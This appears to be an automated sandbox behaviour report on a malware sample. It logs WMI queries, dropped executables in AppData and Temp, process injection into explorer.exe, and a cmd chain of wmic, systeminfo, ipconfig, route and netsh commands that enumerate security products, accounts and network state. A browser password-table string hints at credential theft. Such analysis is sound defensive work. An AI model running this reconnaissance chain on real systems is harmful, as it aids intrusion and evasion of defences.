Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="504"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="564"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="992"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="444"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="732"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="280"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1032"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1056"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1068"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1148"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1188"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1232"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1384"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1424"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1612"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1660"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1688"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1700"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1820"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1836"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1952"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2024"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2096"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2188"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2204"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2240"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2392"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2400"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2588"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2596"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2628"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2768"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2868"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2932"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3260"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3512"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3696"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3756"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3984"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2456"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4132"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4800"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4800"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5152"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5932"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6708"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6792"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6836"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6960"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3584"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5608"::GetOwner

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9VgIkx4su0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: A7E9.tmp.10.dr, AF9D.tmp.10.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9VgIkx4su0.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\9VgIkx4su0.exe "C:\Users\user\Desktop\9VgIkx4su0.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eihchav C:\Users\user\AppData\Roaming\eihchav
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3E40.exe C:\Users\user\AppData\Local\Temp\3E40.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dghchav C:\Users\user\AppData\Roaming\dghchav
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FDDB.exe C:\Users\user\AppData\Local\Temp\FDDB.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dghchav C:\Users\user\AppData\Roaming\dghchav
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eihchav C:\Users\user\AppData\Roaming\eihchav
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3E40.exe C:\Users\user\AppData\Local\Temp\3E40.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FDDB.exe C:\Users\user\AppData\Local\Temp\FDDB.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv	Jump to behavior

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
